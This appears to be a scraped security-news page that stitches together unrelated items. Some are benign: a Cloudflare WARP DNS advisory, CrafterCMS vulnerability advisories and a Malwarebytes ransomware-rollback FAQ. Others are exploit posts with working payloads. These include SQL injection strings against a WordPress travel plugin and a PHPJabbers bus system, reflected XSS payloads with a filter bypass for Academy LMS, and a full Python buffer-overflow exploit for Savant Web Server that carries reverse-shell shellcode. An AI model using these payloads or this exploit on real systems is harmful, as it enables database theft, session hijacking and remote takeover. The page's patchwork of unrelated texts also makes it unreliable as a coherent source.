The Cloudflare WARP client for Windows assigns loopback IPv4 addresses for the DNS Servers, since WARP acts as local DNS server that performs DNS queries in a secure manner, however, if a user is connected to WARP over an IPv6-capable network, te WARP client did not assign loopback IPv6 addresses but Unique Local Addresses, which under certain conditions could point towards unknown devices in the same local network which enables an Attacker to view DNS queries made by the device.




CVE-2023-2754

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CrafterCMS Engine on Windows, MacOS, Linux, x86, ARM, 64 bit allows Reflected XSS.This issue affects CrafterCMS: from 4.0.0 through 4.0.2, from 3.1.0 through 3.1.27.



CrafterCMS

*   

**CV-2023080301**

 

**Date**

2023.08.03

**Affected Versions**

**4.0** <= 4.0.2, **3.1** =< 3.1.27

**Vulnerability Type**

CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)

**Risk**

High

**Description**

Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CrafterCMS Engine on Windows, MacOS, Linux, x86, ARM, 64 bit allows Reflected XSS.

**CVE**

https://www.cve.org/cverecord?id=CVE-2023-4136

**Credit**

Discovered by Egidio Romano <egidio.romano@mindedsecurity.com\>, working with IMQ Minded Security

**CV-2023021701**

 

**Date**

2023.02.17

**Affected Versions**

**4.0** <= 4.0.1, **3.1** =< 3.1.26

**Vulnerability Type**

CWE-89 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Risk**

Medium

**Description**

Authenticated administrators can perform a SQL Injection attack against the authoring database that holds Studio users, groups, and item workflow states.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2023-26020

**Credit**

Gil Correia, gil.correia@devoteam.com

**CV-2022091302**

 

**Date**

2022.09.13

**Affected Versions**

**3.1** < 3.1.23

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

Medium

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2022-40635

**Credit**

Matei “Mal” Badanoiu, https://github.com/mbadanoiu

**CV-2022091301**

 

**Date**

2022.09.13

**Affected Versions**

**3.1** < 3.1.23

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

Medium

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2022-40634

**Credit**

Matei “Mal” Badanoiu, https://github.com/mbadanoiu

**CV-2022051603**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

High

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23267

**Credit**

Kai Zhao (ToTU Security Team), https://github.com/happyhacking-k

**CV-2022051602**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-117 Improper Output Neutralization for Logs

**Risk**

Medium

**Description**

An anonymous user can craft a URL with text that ends up in the log viewer as is.The text can then include textual messages to mislead the administrator.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23266

**Credit**

Faizan Wani, https://github.com/faizanw8

**CV-2021120106**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’)

**Risk**

Medium

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) in CrafterEngine

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23263

**Credit**

Carlos Ortiz, https://github.com/cortiz

**CV-2021120107**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’) CWE-668 Exposure of Resource to Wrong Sphere

**Risk**

High

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) and Exposureof Resource to Wrong Sphere in Crafter Search

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23264

**Credit**

Sparsh Kulshrestha, https://github.com/sparshkulshrestha

**CV-2020080102**

 

**Date**

2020.08.01

**Affected Versions**

**3.0** < 3.0.27  
**3.1** < 3.1.7

**Vulnerability Type**

RCE

**Risk**

Medium

**Description**

Authenticated attackers with developer privileges in Crafter Studio may execute OS commands via deep inspection of FreeMarker template exposed objects.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2020-25803

**Credit**

Alvaro Muñoz (GitHub), https://github.com/pwntester

**CV-2017061502**

 

**Date**

2017.06.15

**Affected Versions**

**3.0** < 3.0.1

**Vulnerability Type**

Directory Traversal

**Risk**

Critical

**Description**

A directory traversal vulnerability exists which allows unauthenticated attackers to overwrite files from the operating system which can lead to RCE.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2017-15681

**Credit**

Jasmin Landry, https://github.com/JR0ch17

CVE-2023-4136: Security Advisories — CrafterCMS 4.0.7 documentation

Categories: Business
Malwarebytes Ransomware Rollback rescues your data from encryption by effectively “turning back the clock” of a ransomware attack. But how does it work, exactly?



(Read more...)




The post FAQ: How does Malwarebytes ransomware rollback work? appeared first on Malwarebytes Labs.

As the old cybersecurity saying goes: “It’s not if, but when.”

Everyone and their grandma have repeated this foreboding maxim about the nature of ransomware attacks, but sadly, that doesn't make it any less true. Time and again we’re reminded that ransomware can slip past even the best defenses.

Prevention alone, it seems, can only take us so far—so when ransomware hits, organizations need a way to emerge safely from the fallout, data intact.

Enter Malwarebytes Ransomware Rollback, which rescues your data from encryption by effectively “turning back the clock” of a ransomware attack. Dr. Strange style.

But how does it work, exactly? And what are some of the advanced settings that are available?

Let’s dive into the finer details in this post.

**How It Works**

The bedrock of Ransomware Rollback is a kernel mode driver to monitor file system changes and make a copy of files before modification. This includes self-protection against attack to the backups.

Malwarebytes Endpoint Detection and Response (EDR) first spends a 14-day period learning what applications on the system can be trusted. During this time, it logs the various applications that typically interact with files. After this period, the EDR establishes a list of trusted, or "whitelisted," applications.

Advanced settings includes additional features for Ransomware Rollback. Learn more here.

For performance optimization, an application that is on the whitelist is ignored.

Before any application can make any changes, apart from ignored applications, Malwarebytes EDR saves a backup copy of the file it's trying to modify. It is unknown at the time of modification whether a process is malicious, so every file is backed up.

If the application is later found to be ransomware that encrypts the file, making it unreadable and demanding a ransom for its decryption, the EDR system can use the backup copy it saved to restore the file to its previous state. This is what is meant by "rollback."

When all's said and done, the system effectively nullifies the ransomware attack by ensuring a recent clean, unencrypted copy of the file is always available.

**FAQ****Does ransomware rollback use Volume Shadow Copy Service?**

No, ransomware rollback does not use Volume Shadow Copy Service. Instead, it uses proprietary and patent-pending technology, with protected folders as malware often targets the Volume Shadow Copy Service.

**How does the service know which files to restore, is it a snapshot?**

Backups are continuous, for any files modified, and are not a snapshot

The process making the change is recorded for each file. Subsequently when a rollback is performed, it is precise because only files modified by the specific process are restored.

**Where is the rollback cache stored in the system?**

The rollback cache is stored in a hidden Windows system folder. Typically, you can find it under: C:\\ProgramData\\Malwarebytes Endpoint Agent\\Plugins\\EDRPlugin\\Backup.

**Does ransomware rollback always use some amount of disk space? Why is that?**

Yes, ransomware rollback always uses some disk space due to its buffer and cleanup operations. This means there will always be some small disk space used by the feature.

For every file modified, e.g., documents, pictures, etc., space for a copy is required. If there is no activity, then after a few days there would be zero used. However, if ransomware encrypted 10 Gb of files, then there would be 10 Gb of backup/before copies.

**How much space does the rollback cache take up on a typical laptop or desktop?**

On a typical laptop using common applications like Microsoft Office, the endpoint usually uses less than 200MB of space for a 72-hour rollback window and a maximum individual file size of 20MB – 100 Mgb.

**If a computer is under attack and 10 Gb of files were encrypted, how much space would we use for the 'before' encryption file backup?**

If a computer is under attack and 10 GB of files were encrypted, we would use approximately 10 GB of space for each 'before' encryption file. The system will back up the files in their original state before encryption, so the space used is equal to the size of the original files.

**How far back can I rollback if my files are encrypted by ransomware?**

By default, ransomware rollback stores the last 48 hours and is configurable up to 72 hours of file changes for files. You can alter these parameters in the Endpoint Protection Advanced policy.

**What types of files does ransomware rollback back up? Are there any limitations or exclusions?**

Ransomware rollback preemptively backs up all file types including pictures, documents, JSON/XML configurations, EXEs, unless they are explicitly excluded, globally excluded, or exceed the maximum file size.

**What happens to my files in case of a ransomware attack if my disk is full?**

If the hard drive is full and file encryption starts without enough disk space for a backup copy of the files, the data will be lost. Therefore, it's crucial for users to monitor for low disk space.

**Does Malwarebytes clean up files that have been backed up by Endpoint Detection and Response (EDR) after 72 hours?**

Yes, our system is designed to be self-cleaning. Files that are backed up by EDR are frequently cleaned, if they are older than the configured period.

**Try Ransomware Rollback Today**

To recap, Malwarebytes Ransomware Rollback is a last-resort recovery tool within Malwarebytes EDR, designed for swift recovery after other defense layers have been compromised.

While useful, Ransomware Rollback doesn't replace classic backups or EDR's other proactive measures like Suspicious Activity Monitoring. It's a rarely needed, but vital last-resort option. 

Read our Ransomware protection with Malwarebytes EDR: Your FAQs, answered! article for more on how Malwarebytes EDR stops ransomware attacks.

For a more technical deep-dive into Ransomware Rollback, check out https://service.malwarebytes.com/hc/en-us/articles/4413802760851-Configure-Ransomware-Rollback-in-Nebula 

**Get a free EDR demo today**

FAQ: How does Malwarebytes ransomware rollback work?

WordPress Adivaha Travel plugin version 2.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Database Access## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /mobile-app/v3/GET  parameter 'pid' is vulnerable to SQL Injectionhttps://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot---Parameter: pid (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot---[-] Done

WordPress Adivaha Travel 2.3 SQL Injection

PHPJabbers Bus Reservation System version 1.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Bus Reservation System 1.1 - SQL Injection# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/bus-reservation-system/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4111## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /index.phpGET parameter 'pickup_id' is vulnerable to SQL Injectionhttps://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[SQLi]&session_id=---Parameter: pickup_id (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&session_id=    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND 07569=7569&session_id=    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (IF - comment)    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3) AND IF(now()=sysdate(),SLEEP(5),0)-- wXyW&session_id=---[-] Done

PHPJabbers Bus Reservation System 1.1 SQL Injection

Academy LMS version 6.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 6.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site # CVE: CVE-2023-4119## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /academy/home/coursesGET parameter 'query' is vulnerable to XSShttps://website/academy/home/courses?query=[XSS]Path: /academy/home/coursesGET parameter 'sort_by' is vulnerable to XSShttps://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]XSS Payloads (Blocked) :<script>alert(1)</script>ldt4d"><ScRiPt>alert(1)</ScRiPt>nuyddXSS Payload Bypass Filter  : cplvz"><img src=a onerror=alert(1)>fk4ap[-] Done

Academy LMS 6.0 Cross Site Scripting

Savant Web Server version 3.1 remote buffer overflow exploit with egghunter shellcode.

    # Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)# Date: [30/07/2023]# Exploit Author: [0xBOF90]# Vendor Homepage: [link]# Version: [app version] (3.1)# Tested on: [Windows 10]import socketimport systry: server = b"192.168.56.102" #\x00\x0a\x0d\x25 port = 80 size = 253 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25" buf =  b"" buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58" buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f" buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e" buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99" buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80" buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31" buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3" buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d" buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f" buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47" buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34" buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd" buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a" buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42" buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a" buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5" buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5" buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb" buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed" buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39" buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e" buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61" buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d" buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a" buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46" buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03" buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d" buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1" buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d" buf += b"\x6e\x61\x03" httpMethod =  b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /" # xor ecx, ecx; testecx, ecx; je 0x17 egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53" egghunter +=b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c" egghunter +=b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7" egghunter += b"\xff\xe7" inputBuffer =  b"\x90"*10+egghunter inputBuffer += b"\x41" * (size-len(egghunter)-10) inputBuffer += b"\x74\x86\x41"#0x00418674 httpEndRequest = b"\r\n\r\n" shellcode = b"w00tw00t"+buf buf = httpMethod + inputBuffer + httpEndRequest +shellcode print("Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buf) s.close() print("Done!")except socket.error: print("Could not connect!")

Savant Web Server 3.1 Remote Buffer Overflow

PHPJabbers Rental Property Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4117## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Rental Property Booking 2.0 Cross Site Scripting

PHPJabbers Taxi Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/taxi-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4116## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS][-] Done

PHPJabbers Taxi Booking 2.0 Cross Site Scripting

PHPJabbers Cleaning Business version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cleaning-business-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4115## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS][-] Done

Tag

#windows